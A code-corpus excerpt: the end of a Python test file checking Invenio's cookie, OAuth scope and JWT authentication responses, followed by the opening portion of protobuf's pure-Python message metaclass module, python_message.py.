        assert 'Set-Cookie' not in res.headers
        # try to access a scope protected zone (and pass)
        res = client.post(app.url_for_test2resource_token)
        assert 200 == res.status_code
        # try to access to authentication required zone
        res = client.post(app.url_for_test3resource)
        assert 401 == res.status_code
        assert 'Set-Cookie' not in res.headers
        # try to access a scope protected zone (and fail)
        res = client.post(app.url_for_test2resource_token_noscope)
        assert 403 == res.status_code
        assert 'Set-Cookie' not in res.headers
        # try to access to login_required zone (and redirected to login)
        res = client.post(app.url_for_test3resource)
        assert 401 == res.status_code
        assert 'Set-Cookie' not in res.headers
        # login
        res = client.post(url_for('security.login'), data=dict(
            email='info@inveniosoftware.org',
            password='tester'
        ))
        assert 'Set-Cookie' in res.headers
        # logout
        res = client.get(url_for('security.logout'))
        assert 302 == res.status_code
        res = client.post(app.url_for_test2resource)
        assert 401 == res.status_code
        assert 'Set-Cookie' not in res.headers
        # try to access to login_required zone (and pass)
        res = client.post(app.url_for_test2resource_token)
        assert 200 == res.status_code
        assert 'Set-Cookie' not in res.headers
        # try to access to login_required zone (and not pass)
        res = client.post(app.url_for_test3resource)
        assert 401 == res.status_code
        assert 'Set-Cookie' not in res.headers
def test_jwt_client(resource_fixture, api_app):
    """Test client.

    Exercises the JWT authentication path end-to-end: missing token, valid
    token, token for a nonexistent user, expired token, wrong auth scheme,
    and finally a custom header name/type configured on the app.
    """
    app = resource_fixture
    # Enable JWT
    app.config['ACCOUNTS_JWT_ENABLE'] = True
    with app.test_client() as client:
        # Try to access to authentication required zone
        res = client.post(app.url_for_test3resource)
        assert 401 == res.status_code
        # Login
        res = client.post(url_for('security.login'), data=dict(
            email='info@inveniosoftware.org',
            password='tester'
        ))
        assert 'Set-Cookie' in res.headers
        # Try to access to without a JWT
        res = client.post(app.url_for_test3resource)
        assert 400 == res.status_code
        # Generate a token
        token = current_accounts.jwt_creation_factory()
        # Make the request
        res = client.post(
            app.url_for_test3resource,
            headers=[
                ('Authorization', 'Bearer {}'.format(token))
            ]
        )
        assert 200 == res.status_code
        # Try with invalid user
        token = current_accounts.jwt_creation_factory(user_id=-20)
        # Make the request
        res = client.post(
            app.url_for_test3resource,
            headers=[
                ('Authorization', 'Bearer {}'.format(token))
            ]
        )
        assert 403 == res.status_code
        assert 'The JWT token is not valid.' in res.get_data(as_text=True)
        # Try to access with expired token
        extra = dict(
            exp=datetime(1970, 1, 1),
        )
        # Create token
        token = current_accounts.jwt_creation_factory(additional_data=extra)
        # Make the request
        res = client.post(
            app.url_for_test3resource,
            headers=[
                ('Authorization', 'Bearer {0}'.format(token))
            ]
        )
        assert 'The JWT token is expired.' in res.get_data(as_text=True)
        # Not correct Schema
        # Generate a token
        token = current_accounts.jwt_creation_factory()
        # Make the request
        res = client.post(
            app.url_for_test3resource,
            headers=[
                ('Authorization', 'Avengers {}'.format(token))
            ]
        )
        assert 400 == res.status_code
        assert 'Missing required header argument.' in res.get_data(
            as_text=True)
        # Check different header type
        api_app.config['OAUTH2SERVER_JWT_AUTH_HEADER'] = 'X-Travis-Mark-XLII'
        api_app.config['OAUTH2SERVER_JWT_AUTH_HEADER_TYPE'] = None
        # Create token
        token = current_accounts.jwt_creation_factory()
        # Make the request
        res = client.post(
            app.url_for_test3resource,
            headers=[
                ('X-Travis-Mark-XLII', '{0}'.format(token))
            ]
        )
        assert 200 == res.status_code
| 35.473684 | 77 | 0.64095 |
cb97cb2847f62660de92107b03cea21d59ec390f | 56,829 | py | Python | packager/third_party/protobuf/python/google/protobuf/internal/python_message.py | koln67/shaka-packager | 5b9fd409a5de502e8af2e46ee12840bd2226874d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 11,356 | 2017-12-08T19:42:32.000Z | 2022-03-31T16:55:25.000Z | packager/third_party/protobuf/python/google/protobuf/internal/python_message.py | koln67/shaka-packager | 5b9fd409a5de502e8af2e46ee12840bd2226874d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2,402 | 2017-12-08T22:31:01.000Z | 2022-03-28T19:25:52.000Z | packager/third_party/protobuf/python/google/protobuf/internal/python_message.py | koln67/shaka-packager | 5b9fd409a5de502e8af2e46ee12840bd2226874d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1,343 | 2017-12-08T19:47:19.000Z | 2022-03-26T11:31:36.000Z | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# This code is meant to work on Python 2.4 and above only.
#
# TODO(robinson): Helpers for verbose, common checks like seeing if a
# descriptor's cpp_type is CPPTYPE_MESSAGE.
"""Contains a metaclass and helper functions used to create
protocol message classes from Descriptor objects at runtime.
Recall that a metaclass is the "type" of a class.
(A class is to a metaclass what an instance is to a class.)
In this case, we use the GeneratedProtocolMessageType metaclass
to inject all the useful functionality into the classes
output by the protocol compiler at compile-time.
The upshot of all this is that the real implementation
details for ALL pure-Python protocol buffers are *here in
this file*.
"""
__author__ = 'robinson@google.com (Will Robinson)'
from io import BytesIO
import struct
import sys
import weakref
import six
# We use "as" to avoid name collisions with variables.
from google.protobuf.internal import containers
from google.protobuf.internal import decoder
from google.protobuf.internal import encoder
from google.protobuf.internal import enum_type_wrapper
from google.protobuf.internal import message_listener as message_listener_mod
from google.protobuf.internal import type_checkers
from google.protobuf.internal import well_known_types
from google.protobuf.internal import wire_format
from google.protobuf import descriptor as descriptor_mod
from google.protobuf import message as message_mod
from google.protobuf import text_format
# Shorthand alias used throughout this module.
_FieldDescriptor = descriptor_mod.FieldDescriptor
# Full name of the well-known Any type; special-cased in equality checks.
_AnyFullTypeName = 'google.protobuf.Any'
class GeneratedProtocolMessageType(type):

  """Metaclass for protocol message classes created at runtime from Descriptors.

  We add implementations for all methods described in the Message class.  We
  also create properties to allow getting/setting all fields in the protocol
  message.  Finally, we create slots to prevent users from accidentally
  "setting" nonexistent fields in the protocol message, which then wouldn't get
  serialized / deserialized properly.

  The protocol compiler currently uses this metaclass to create protocol
  message classes at runtime.  Clients can also manually create their own
  classes at runtime, as in this example:

  mydescriptor = Descriptor(.....)
  factory = symbol_database.Default()
  factory.pool.AddDescriptor(mydescriptor)
  MyProtoClass = factory.GetPrototype(mydescriptor)
  myproto_instance = MyProtoClass()
  myproto.foo_field = 23
  ...
  """

  # Must be consistent with the protocol-compiler code in
  # proto2/compiler/internal/generator.*.
  _DESCRIPTOR_KEY = 'DESCRIPTOR'

  def __new__(cls, name, bases, dictionary):
    """Custom allocation for runtime-generated class types.

    We override __new__ because this is apparently the only place
    where we can meaningfully set __slots__ on the class we're creating(?).
    (The interplay between metaclasses and slots is not very well-documented).

    Args:
      name: Name of the class (ignored, but required by the
        metaclass protocol).
      bases: Base classes of the class we're constructing.
        (Should be message.Message).  We ignore this field, but
        it's required by the metaclass protocol
      dictionary: The class dictionary of the class we're
        constructing.  dictionary[_DESCRIPTOR_KEY] must contain
        a Descriptor object describing this protocol message
        type.

    Returns:
      Newly-allocated class.
    """
    descriptor = dictionary[GeneratedProtocolMessageType._DESCRIPTOR_KEY]
    # Well-known types (Any, Timestamp, ...) get an extra mixin base class
    # that supplies their special-purpose helper methods.
    if descriptor.full_name in well_known_types.WKTBASES:
      bases += (well_known_types.WKTBASES[descriptor.full_name],)
    _AddClassAttributesForNestedExtensions(descriptor, dictionary)
    # __slots__ must be installed in the dictionary before type.__new__ runs.
    _AddSlots(descriptor, dictionary)
    superclass = super(GeneratedProtocolMessageType, cls)
    new_class = superclass.__new__(cls, name, bases, dictionary)
    return new_class

  def __init__(cls, name, bases, dictionary):
    """Here we perform the majority of our work on the class.
    We add enum getters, an __init__ method, implementations
    of all Message methods, and properties for all fields
    in the protocol type.

    Args:
      name: Name of the class (ignored, but required by the
        metaclass protocol).
      bases: Base classes of the class we're constructing.
        (Should be message.Message).  We ignore this field, but
        it's required by the metaclass protocol
      dictionary: The class dictionary of the class we're
        constructing.  dictionary[_DESCRIPTOR_KEY] must contain
        a Descriptor object describing this protocol message
        type.
    """
    descriptor = dictionary[GeneratedProtocolMessageType._DESCRIPTOR_KEY]
    cls._decoders_by_tag = {}
    if (descriptor.has_options and
        descriptor.GetOptions().message_set_wire_format):
      # MessageSet wire format uses a single special item tag for all fields.
      cls._decoders_by_tag[decoder.MESSAGE_SET_ITEM_TAG] = (
          decoder.MessageSetItemDecoder(descriptor), None)

    # Attach stuff to each FieldDescriptor for quick lookup later on.
    for field in descriptor.fields:
      _AttachFieldHelpers(cls, field)

    descriptor._concrete_class = cls  # pylint: disable=protected-access
    _AddEnumValues(descriptor, cls)
    _AddInitMethod(descriptor, cls)
    _AddPropertiesForFields(descriptor, cls)
    _AddPropertiesForExtensions(descriptor, cls)
    _AddStaticMethods(cls)
    _AddMessageMethods(descriptor, cls)
    _AddPrivateHelperMethods(descriptor, cls)
    superclass = super(GeneratedProtocolMessageType, cls)
    superclass.__init__(name, bases, dictionary)
# Stateless helpers for GeneratedProtocolMessageType below.
# Outside clients should not access these directly.
#
# I opted not to make any of these methods on the metaclass, to make it more
# clear that I'm not really using any state there and to keep clients from
# thinking that they have direct access to these construction helpers.
def _PropertyName(proto_field_name):
  """Returns the Python property name exposing a protocol message field.

  Currently this is simply the .proto field name, unchanged.  Escaping of
  Python keywords (e.g. 'yield') was considered and deliberately rejected:
  users rely on getattr()/setattr() with the raw proto names, and renaming
  the properties would force every such caller to apply the same
  transformation.  A keyword-named field remains accessible via
  getattr()/setattr().

  Args:
    proto_field_name: The protocol message field name, exactly
      as it appears (or would appear) in a .proto file.
  """
  # Intentionally the identity function -- see rationale above.
  return proto_field_name
def _VerifyExtensionHandle(message, extension_handle):
  """Verify that the given extension handle is valid.

  Raises:
    KeyError: if the handle is not a FieldDescriptor, is not an extension,
      lacks a containing type, or extends a different message type.
  """
  if not isinstance(extension_handle, _FieldDescriptor):
    raise KeyError('HasExtension() expects an extension handle, got: %s' %
                   extension_handle)
  if not extension_handle.is_extension:
    raise KeyError('"%s" is not an extension.' % extension_handle.full_name)
  container = extension_handle.containing_type
  if not container:
    raise KeyError('"%s" is missing a containing_type.'
                   % extension_handle.full_name)
  if container is not message.DESCRIPTOR:
    raise KeyError('Extension "%s" extends message type "%s", but this '
                   'message is of type "%s".' %
                   (extension_handle.full_name,
                    container.full_name,
                    message.DESCRIPTOR.full_name))
def _AddSlots(message_descriptor, dictionary):
  """Installs a '__slots__' entry in dictionary.

  The slots list enumerates every internal attribute a generated message
  instance may carry, preventing accidental creation of other attributes.

  Args:
    message_descriptor: A Descriptor instance describing this message type.
    dictionary: Class dictionary to which we'll add a '__slots__' entry.
  """
  dictionary['__slots__'] = [
      '_cached_byte_size',
      '_cached_byte_size_dirty',
      '_fields',
      '_unknown_fields',
      '_is_present_in_parent',
      '_listener',
      '_listener_for_children',
      '__weakref__',
      '_oneofs',
  ]
def _IsMessageSetExtension(field):
  """True iff field is an optional message extension of a MessageSet type."""
  if not field.is_extension:
    return False
  parent = field.containing_type
  if not (parent.has_options and
          parent.GetOptions().message_set_wire_format):
    return False
  return (field.type == _FieldDescriptor.TYPE_MESSAGE and
          field.label == _FieldDescriptor.LABEL_OPTIONAL)
def _IsMapField(field):
  """True iff field is a synthesized map<k, v> entry field."""
  if field.type != _FieldDescriptor.TYPE_MESSAGE:
    return False
  entry_type = field.message_type
  return entry_type.has_options and entry_type.GetOptions().map_entry
def _IsMessageMapField(field):
  """True iff the map field's value type is itself a message."""
  value_field = field.message_type.fields_by_name['value']
  return value_field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE
def _AttachFieldHelpers(cls, field_descriptor):
  """Precomputes serialization helpers and caches them on the descriptor.

  Stores _encoder, _sizer and _default_constructor on field_descriptor, and
  registers wire-format decoders in cls._decoders_by_tag keyed by exact tag
  bytes, so the (de)serialization hot paths avoid per-call dispatch.
  """
  is_repeated = (field_descriptor.label == _FieldDescriptor.LABEL_REPEATED)
  is_packable = (is_repeated and
                 wire_format.IsTypePackable(field_descriptor.type))
  if not is_packable:
    is_packed = False
  elif field_descriptor.containing_type.syntax == "proto2":
    # proto2: packed only when explicitly requested via [packed = true].
    is_packed = (field_descriptor.has_options and
                 field_descriptor.GetOptions().packed)
  else:
    # proto3: packed by default for packable fields, unless explicitly
    # set to false in the field options.
    has_packed_false = (field_descriptor.has_options and
                        field_descriptor.GetOptions().HasField("packed") and
                        field_descriptor.GetOptions().packed == False)
    is_packed = not has_packed_false
  is_map_entry = _IsMapField(field_descriptor)

  if is_map_entry:
    field_encoder = encoder.MapEncoder(field_descriptor)
    sizer = encoder.MapSizer(field_descriptor,
                             _IsMessageMapField(field_descriptor))
  elif _IsMessageSetExtension(field_descriptor):
    field_encoder = encoder.MessageSetItemEncoder(field_descriptor.number)
    sizer = encoder.MessageSetItemSizer(field_descriptor.number)
  else:
    field_encoder = type_checkers.TYPE_TO_ENCODER[field_descriptor.type](
        field_descriptor.number, is_repeated, is_packed)
    sizer = type_checkers.TYPE_TO_SIZER[field_descriptor.type](
        field_descriptor.number, is_repeated, is_packed)

  field_descriptor._encoder = field_encoder
  field_descriptor._sizer = sizer
  field_descriptor._default_constructor = _DefaultValueConstructorForField(
      field_descriptor)

  def AddDecoder(wiretype, is_packed):
    # Registers a decoder for this field under the tag bytes formed from
    # (field number, wiretype).
    tag_bytes = encoder.TagBytes(field_descriptor.number, wiretype)
    decode_type = field_descriptor.type
    if (decode_type == _FieldDescriptor.TYPE_ENUM and
        type_checkers.SupportsOpenEnums(field_descriptor)):
      # Open enums (proto3) keep unknown values, so decode as a plain int32.
      decode_type = _FieldDescriptor.TYPE_INT32

    oneof_descriptor = None
    if field_descriptor.containing_oneof is not None:
      oneof_descriptor = field_descriptor

    if is_map_entry:
      is_message_map = _IsMessageMapField(field_descriptor)

      field_decoder = decoder.MapDecoder(
          field_descriptor, _GetInitializeDefaultForMap(field_descriptor),
          is_message_map)
    else:
      field_decoder = type_checkers.TYPE_TO_DECODER[decode_type](
          field_descriptor.number, is_repeated, is_packed,
          field_descriptor, field_descriptor._default_constructor)

    cls._decoders_by_tag[tag_bytes] = (field_decoder, oneof_descriptor)

  AddDecoder(type_checkers.FIELD_TYPE_TO_WIRE_TYPE[field_descriptor.type],
             False)

  if is_repeated and wire_format.IsTypePackable(field_descriptor.type):
    # To support wire compatibility of adding packed = true, add a decoder for
    # packed values regardless of the field's options.
    AddDecoder(wire_format.WIRETYPE_LENGTH_DELIMITED, True)
def _AddClassAttributesForNestedExtensions(descriptor, dictionary):
  """Copies nested extension descriptors into the class dictionary."""
  for name, extension in descriptor.extensions_by_name.items():
    # The compiler guarantees extension names never collide with other
    # class attributes.
    assert name not in dictionary
    dictionary[name] = extension
def _AddEnumValues(descriptor, cls):
  """Sets class-level attributes for all enum fields defined in this message.

  Also exports, per enum type, a class-level wrapper object that can name
  enum values.

  Args:
    descriptor: Descriptor object for this message type.
    cls: Class we're constructing for this message type.
  """
  for enum_type in descriptor.enum_types:
    wrapper = enum_type_wrapper.EnumTypeWrapper(enum_type)
    setattr(cls, enum_type.name, wrapper)
    for value in enum_type.values:
      setattr(cls, value.name, value.number)
def _GetInitializeDefaultForMap(field):
  """Returns a factory producing the default (empty) container for a map field.

  Args:
    field: FieldDescriptor of the repeated map entry field.

  Returns:
    A one-argument callable taking the parent message and returning a fresh
    MessageMap or ScalarMap wired to the parent's child listener.

  Raises:
    ValueError: if the field is not repeated (map entry fields always are).
  """
  if field.label != _FieldDescriptor.LABEL_REPEATED:
    raise ValueError('map_entry set on non-repeated field %s' % (
        field.name))
  fields_by_name = field.message_type.fields_by_name
  key_checker = type_checkers.GetTypeChecker(fields_by_name['key'])

  value_field = fields_by_name['value']
  if _IsMessageMapField(field):
    def MakeMessageMapDefault(message):
      # Values are messages: container must know the value message type.
      return containers.MessageMap(
          message._listener_for_children, value_field.message_type, key_checker,
          field.message_type)
    return MakeMessageMapDefault
  else:
    value_checker = type_checkers.GetTypeChecker(value_field)
    def MakePrimitiveMapDefault(message):
      return containers.ScalarMap(
          message._listener_for_children, key_checker, value_checker,
          field.message_type)
    return MakePrimitiveMapDefault
def _DefaultValueConstructorForField(field):
  """Returns a function which returns a default value for a field.

  Args:
    field: FieldDescriptor object for this field.

  The returned function has one argument:
    message: Message instance containing this field, or a weakref proxy
      of same.

  That function in turn returns a default value for this field.  The default
    value may refer back to |message| via a weak reference.
  """
  # Map fields delegate to the dedicated map-container factory.
  if _IsMapField(field):
    return _GetInitializeDefaultForMap(field)

  if field.label == _FieldDescriptor.LABEL_REPEATED:
    if field.has_default_value and field.default_value != []:
      raise ValueError('Repeated field default value not empty list: %s' % (
          field.default_value))
    if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
      # We can't look at _concrete_class yet since it might not have
      # been set.  (Depends on order in which we initialize the classes).
      message_type = field.message_type
      def MakeRepeatedMessageDefault(message):
        return containers.RepeatedCompositeFieldContainer(
            message._listener_for_children, field.message_type)
      return MakeRepeatedMessageDefault
    else:
      type_checker = type_checkers.GetTypeChecker(field)
      def MakeRepeatedScalarDefault(message):
        return containers.RepeatedScalarFieldContainer(
            message._listener_for_children, type_checker)
      return MakeRepeatedScalarDefault

  if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
    # _concrete_class may not yet be initialized.
    message_type = field.message_type
    def MakeSubMessageDefault(message):
      result = message_type._concrete_class()
      # Oneof members need a listener that also updates the oneof state.
      result._SetListener(
          _OneofListener(message, field)
          if field.containing_oneof is not None
          else message._listener_for_children)
      return result
    return MakeSubMessageDefault

  def MakeScalarDefault(message):
    # TODO(protobuf-team): This may be broken since there may not be
    # default_value.  Combine with has_default_value somehow.
    return field.default_value
  return MakeScalarDefault
def _ReraiseTypeErrorWithFieldName(message_name, field_name):
  """Re-raise the currently-handled TypeError with the field name added.

  Must be called from inside an 'except TypeError' block.  TypeError
  subclasses and multi-arg TypeErrors are re-raised unchanged.
  """
  exc = sys.exc_info()[1]
  if len(exc.args) == 1 and type(exc) is TypeError:
    # simple TypeError; add field name to exception message
    exc = TypeError('%s for field %s.%s' % (str(exc), message_name, field_name))

  # re-raise possibly-amended exception with original traceback:
  six.reraise(type(exc), exc, sys.exc_info()[2])
def _AddInitMethod(message_descriptor, cls):
  """Adds an __init__ method to cls.

  The generated __init__ accepts keyword arguments matching field names;
  None values are ignored, enum values may be given as labels, and
  composite/map values may be given as dicts.
  """

  def _GetIntegerEnumValue(enum_type, value):
    """Convert a string or integer enum value to an integer.

    If the value is a string, it is converted to the enum value in
    enum_type with the same name.  If the value is not a string, it's
    returned as-is.  (No conversion or bounds-checking is done.)
    """
    if isinstance(value, six.string_types):
      try:
        return enum_type.values_by_name[value].number
      except KeyError:
        raise ValueError('Enum type %s: unknown label "%s"' % (
            enum_type.full_name, value))
    return value

  def init(self, **kwargs):
    self._cached_byte_size = 0
    # Size cache only starts dirty when initial field values were supplied.
    self._cached_byte_size_dirty = len(kwargs) > 0
    self._fields = {}
    # Contains a mapping from oneof field descriptors to the descriptor
    # of the currently set field in that oneof field.
    self._oneofs = {}

    # _unknown_fields is () when empty for efficiency, and will be turned into
    # a list if fields are added.
    self._unknown_fields = ()
    self._is_present_in_parent = False
    self._listener = message_listener_mod.NullMessageListener()
    self._listener_for_children = _Listener(self)
    for field_name, field_value in kwargs.items():
      field = _GetFieldByName(message_descriptor, field_name)
      if field is None:
        raise TypeError("%s() got an unexpected keyword argument '%s'" %
                        (message_descriptor.name, field_name))
      if field_value is None:
        # field=None is the same as no field at all.
        continue
      if field.label == _FieldDescriptor.LABEL_REPEATED:
        copy = field._default_constructor(self)
        if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:  # Composite
          if _IsMapField(field):
            if _IsMessageMapField(field):
              # Merge rather than assign so dict values may be partial dicts.
              for key in field_value:
                copy[key].MergeFrom(field_value[key])
            else:
              copy.update(field_value)
          else:
            for val in field_value:
              if isinstance(val, dict):
                copy.add(**val)
              else:
                copy.add().MergeFrom(val)
        else:  # Scalar
          if field.cpp_type == _FieldDescriptor.CPPTYPE_ENUM:
            field_value = [_GetIntegerEnumValue(field.enum_type, val)
                           for val in field_value]
          copy.extend(field_value)
        self._fields[field] = copy
      elif field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
        copy = field._default_constructor(self)
        new_val = field_value
        if isinstance(field_value, dict):
          new_val = field.message_type._concrete_class(**field_value)
        try:
          copy.MergeFrom(new_val)
        except TypeError:
          _ReraiseTypeErrorWithFieldName(message_descriptor.name, field_name)
        self._fields[field] = copy
      else:
        if field.cpp_type == _FieldDescriptor.CPPTYPE_ENUM:
          field_value = _GetIntegerEnumValue(field.enum_type, field_value)
        try:
          # Uses the generated property so type checks and oneof/"has"
          # bookkeeping run as side effects.
          setattr(self, field_name, field_value)
        except TypeError:
          _ReraiseTypeErrorWithFieldName(message_descriptor.name, field_name)

  init.__module__ = None
  init.__doc__ = None
  cls.__init__ = init
def _GetFieldByName(message_descriptor, field_name):
  """Looks up a field descriptor by field name.

  Args:
    message_descriptor: A Descriptor describing all fields in message.
    field_name: The name of the field to retrieve.

  Returns:
    The field descriptor associated with the field name.

  Raises:
    ValueError: if no field of that name exists in the message type.
  """
  fields = message_descriptor.fields_by_name
  if field_name in fields:
    return fields[field_name]
  raise ValueError('Protocol message %s has no "%s" field.' %
                   (message_descriptor.name, field_name))
def _AddPropertiesForFields(descriptor, cls):
  """Adds properties for all fields in this protocol message type."""
  for field_descriptor in descriptor.fields:
    _AddPropertiesForField(field_descriptor, cls)

  if descriptor.is_extendable:
    # _ExtensionDict is just an adaptor with no state so we allocate a new one
    # every time it is accessed.
    cls.Extensions = property(lambda self: _ExtensionDict(self))
def _AddPropertiesForField(field, cls):
  """Adds a public property for a protocol message field.

  Clients can use this property to get and (in the case
  of non-repeated scalar fields) directly set the value
  of a protocol message field.

  Args:
    field: A FieldDescriptor for this field.
    cls: The class we're constructing.
  """
  # Guard: if new cpp types are ever introduced, this dispatch must be
  # revisited.
  assert _FieldDescriptor.MAX_CPPTYPE == 10

  setattr(cls, field.name.upper() + "_FIELD_NUMBER", field.number)

  if field.label == _FieldDescriptor.LABEL_REPEATED:
    _AddPropertiesForRepeatedField(field, cls)
  elif field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
    _AddPropertiesForNonRepeatedCompositeField(field, cls)
  else:
    _AddPropertiesForNonRepeatedScalarField(field, cls)
def _AddPropertiesForRepeatedField(field, cls):
  """Adds a public property for a "repeated" protocol message field.  Clients
  can use this property to get the value of the field, which will be either a
  _RepeatedScalarFieldContainer or _RepeatedCompositeFieldContainer (see
  below).

  Note that when clients add values to these containers, we perform
  type-checking in the case of repeated scalar fields, and we also set any
  necessary "has" bits as a side-effect.

  Args:
    field: A FieldDescriptor for this field.
    cls: The class we're constructing.
  """
  proto_field_name = field.name
  property_name = _PropertyName(proto_field_name)

  def getter(self):
    # Containers are created lazily on first access.
    field_value = self._fields.get(field)
    if field_value is None:
      # Construct a new object to represent this field.
      field_value = field._default_constructor(self)

      # Atomically check if another thread has preempted us and, if not, swap
      # in the new object we just created.  If someone has preempted us, we
      # take that object and discard ours.
      # WARNING:  We are relying on setdefault() being atomic.  This is true
      #   in CPython but we haven't investigated others.  This warning appears
      #   in several other locations in this file.
      field_value = self._fields.setdefault(field, field_value)
    return field_value
  # NOTE(review): __module__/__doc__ are overwritten on the synthesized
  # accessor -- presumably to keep generated classes' introspection output
  # clean; confirm before changing.
  getter.__module__ = None
  getter.__doc__ = 'Getter for %s.' % proto_field_name

  # We define a setter just so we can throw an exception with a more
  # helpful error message.
  def setter(self, new_value):
    raise AttributeError('Assignment not allowed to repeated field '
                         '"%s" in protocol message object.' % proto_field_name)

  doc = 'Magic attribute generated for "%s" proto field.' % proto_field_name
  setattr(cls, property_name, property(getter, setter, doc=doc))
def _AddPropertiesForNonRepeatedScalarField(field, cls):
  """Adds a public property for a nonrepeated, scalar protocol message field.
  Clients can use this property to get and directly set the value of the field.
  Note that when the client sets the value of a field by using this property,
  all necessary "has" bits are set as a side-effect, and we also perform
  type-checking.

  Args:
    field: A FieldDescriptor for this field.
    cls: The class we're constructing.
  """
  proto_field_name = field.name
  property_name = _PropertyName(proto_field_name)
  type_checker = type_checkers.GetTypeChecker(field)
  default_value = field.default_value
  # Fix: removed dead local `valid_values = set()` -- it was never read
  # anywhere in this function.
  is_proto3 = field.containing_type.syntax == "proto3"

  def getter(self):
    # TODO(protobuf-team): This may be broken since there may not be
    # default_value.  Combine with has_default_value somehow.
    return self._fields.get(field, default_value)
  getter.__module__ = None
  getter.__doc__ = 'Getter for %s.' % proto_field_name

  # In proto3, fields outside a oneof have no explicit presence: storing the
  # default value is equivalent to clearing the field.
  clear_when_set_to_default = is_proto3 and not field.containing_oneof

  def field_setter(self, new_value):
    # pylint: disable=protected-access
    # Testing the value for truthiness captures all of the proto3 defaults
    # (0, 0.0, enum 0, and False).
    new_value = type_checker.CheckValue(new_value)
    if clear_when_set_to_default and not new_value:
      self._fields.pop(field, None)
    else:
      self._fields[field] = new_value
    # Check _cached_byte_size_dirty inline to improve performance, since scalar
    # setters are called frequently.
    if not self._cached_byte_size_dirty:
      self._Modified()

  if field.containing_oneof:
    def setter(self, new_value):
      field_setter(self, new_value)
      # Record which member of the oneof is now set.
      self._UpdateOneofState(field)
  else:
    setter = field_setter

  setter.__module__ = None
  setter.__doc__ = 'Setter for %s.' % proto_field_name

  # Add a property to encapsulate the getter/setter.
  doc = 'Magic attribute generated for "%s" proto field.' % proto_field_name
  setattr(cls, property_name, property(getter, setter, doc=doc))
def _AddPropertiesForNonRepeatedCompositeField(field, cls):
  """Adds a public property for a nonrepeated, composite protocol message field.
  A composite field is a "group" or "message" field.

  Clients can use this property to get the value of the field, but cannot
  assign to the property directly.

  Args:
    field: A FieldDescriptor for this field.
    cls: The class we're constructing.
  """
  # TODO(robinson): Remove duplication with similar method
  # for non-repeated scalars.
  proto_field_name = field.name
  property_name = _PropertyName(proto_field_name)

  def getter(self):
    # Sub-messages are created lazily on first access.
    field_value = self._fields.get(field)
    if field_value is None:
      # Construct a new object to represent this field.
      field_value = field._default_constructor(self)

      # Atomically check if another thread has preempted us and, if not, swap
      # in the new object we just created.  If someone has preempted us, we
      # take that object and discard ours.
      # WARNING:  We are relying on setdefault() being atomic.  This is true
      #   in CPython but we haven't investigated others.  This warning appears
      #   in several other locations in this file.
      field_value = self._fields.setdefault(field, field_value)
    return field_value
  getter.__module__ = None
  getter.__doc__ = 'Getter for %s.' % proto_field_name

  # We define a setter just so we can throw an exception with a more
  # helpful error message.
  def setter(self, new_value):
    raise AttributeError('Assignment not allowed to composite field '
                         '"%s" in protocol message object.' % proto_field_name)

  # Add a property to encapsulate the getter.
  doc = 'Magic attribute generated for "%s" proto field.' % proto_field_name
  setattr(cls, property_name, property(getter, setter, doc=doc))
def _AddPropertiesForExtensions(descriptor, cls):
  """Adds FOO_FIELD_NUMBER constants for this type's extensions.

  Also caches the pool's per-descriptor extension lookup tables on the class.
  """
  for name, extension_field in descriptor.extensions_by_name.items():
    setattr(cls, name.upper() + "_FIELD_NUMBER", extension_field.number)

  # TODO(amauryfa): Migrate all users of these attributes to functions like
  # pool.FindExtensionByNumber(descriptor).
  if descriptor.file is not None:
    # TODO(amauryfa): Use cls.MESSAGE_FACTORY.pool when available.
    pool = descriptor.file.pool
    cls._extensions_by_number = pool._extensions_by_number[descriptor]
    cls._extensions_by_name = pool._extensions_by_name[descriptor]
def _AddStaticMethods(cls):
  """Installs RegisterExtension() and FromString() static methods on cls."""
  # TODO(robinson): This probably needs to be thread-safe(?)
  def RegisterExtension(extension_handle):
    extension_handle.containing_type = cls.DESCRIPTOR
    # TODO(amauryfa): Use cls.MESSAGE_FACTORY.pool when available.
    cls.DESCRIPTOR.file.pool.AddExtensionDescriptor(extension_handle)
    _AttachFieldHelpers(cls, extension_handle)

  def FromString(s):
    new_message = cls()
    new_message.MergeFromString(s)
    return new_message

  cls.RegisterExtension = staticmethod(RegisterExtension)
  cls.FromString = staticmethod(FromString)
def _IsPresent(item):
  """Given a (FieldDescriptor, value) tuple from _fields, return true if the
  value should be included in the list returned by ListFields()."""
  field_descriptor, value = item
